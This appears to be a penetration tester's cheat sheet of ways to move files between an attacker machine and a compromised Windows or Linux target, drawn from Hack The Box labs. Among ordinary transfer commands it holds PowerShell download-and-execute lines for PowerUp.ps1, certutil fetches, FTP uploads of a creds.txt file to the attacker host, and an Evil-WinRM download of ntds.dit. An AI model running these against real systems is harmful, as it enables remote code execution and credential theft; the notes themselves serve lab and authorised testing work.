File Transfer
HTTP
# HTTP Server
# Python module
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
# pip install updog
# https://github.com/sc0tfree/updog
# This has an upload function
updog 80
# HTTP client
wget http://<ip address>/<file>
curl http://<ip address>/<file> --output <file>
# Certutil
certutil -urlcache -split -f http://<ip address>/<file>
# Powershell
PS>Invoke-WebRequest -URI http://<ip address>/<file> -OutFile C:\Users\Cortin\<file>
PS>(New-Object Net.WebClient).DownloadString('http://<10.10.14.8/PowerUp.ps1')
CMD>powershell -c iex(New-Object Net.WebClient).DownloadString('http://<10.10.14.8/PowerUp.ps1')
PS>Import-Module BitsTransfer; Start-BitsTransfer -Source http://192.168.119.128/target.txt -Destination .
SMB
# -- SMB v2 server --
# Simplified version
# Kali
sudo impacket-smbserver smb $(pwd) -smb2support -user iptracej -password iptracej
# Target
iex (new-Object Net.WebClient).DownloadString('http://10.10.14.4/privesc/SMB2.ps1'); SMB2 -IPAddress 10.10.14.4
# Manual version
# Kali
sudo impacket-smbserver smb $(pwd) -smb2support -user user -password password
# Target
$pass = convertto-securestring 'user' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('user', $pass)
New-PSDrive -Name kali -PSProvider FileSystem -Credential $cred -Root \\<Kali IP>\smb
# -- SMB v1 server --
# Kali
sudo impacket-smbserver smb .
# Target
\\<Kali IP>\smb
FTP
# python ftp module
# sudo apt-get install python3-pyftpdlib
sudo python3 -m pyftpdlib -p 21 -w
# Linux target
ftp
# Windows target
# Binary file
$client = New-Object System.Net.WebClient
$client.Credentials = New-Object System.Net.NetworkCredential("anonymous", "anonymous")
$client.UploadFile("ftp://192.168.119.128/creds.txt", "C:\inetpub\wwwroot\creds.txt")
# ASCII
# Should be 5 or later
$psversiontable
Compress-Archive -Path C:\inetpub\wwwroot\creds.txt -DestinationPath C:\inetpub\wwwroot\creds.txt.zip
$client = New-Object System.Net.WebClient
$client.Credentials = New-Object System.Net.NetworkCredential("anonymous","anonymous")
$client.UploadFile("ftp://192.168.119.128/creds.txt.zip", "C:\inetpub\wwwroot\creds.txt.zip")
TFTP
# Very old UDP based File transfer protocol. By default, it is installed on Windows machines up to Windows XP and 2003.
# https://www.linux.com/topic/networking/trivial-transfers-tftp-part-3-usage/
# Kail
# apt-get install tftp
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/<file> /tftp/
# Windows XP and 2003
tftp 10.10.10.10
tftp> status
tftp> verbose
tftp> binary
tftp> get HERE_I_AM
Netcat
# Reciver
nc -l -p 1235 > nineveh.png
# Sender
nc -w 3 10.10.14.3 1235 < nineveh.png
SCP
scp /path/to/source/file.ext username@x.x.x.x
scp -r /path/to/source/dir username@x.x.x.x
# Kali
sudo systemctl start ssh
sudo mkdir /mnt/dropplet
# Target
scp -r /mnt/opt/* iptracej@<Kali IP>:/mnt/dropplet
sshfs
mount the file system via ssh
# Target
sudo systemctl start ssh
sudo systemctl status ssh
# Kali
sudo apt install sshfs
# create a mount point
sudo mkdir /mnt/droplet
# Ensure you are not in /mnt/droplet
cd ~
# connect to remote system and mount the location
sudo sshfs -o allow_other,default_permissions iptracej@<target IP>:/var/www/html /mnt/droplet
Evil-winrm
Evil-WinRM* PS C:\temp> download <file>
Evil-WinRM* PS C:\temp> download C:\temp\ntds.dit /home/iptracej/htb/Monteverde/download/ntds.dit
Evil-WinRM* PS C:\temp> upload <file>
Evil-WinRM* PS C:\temp> upload nc.exe
Last updated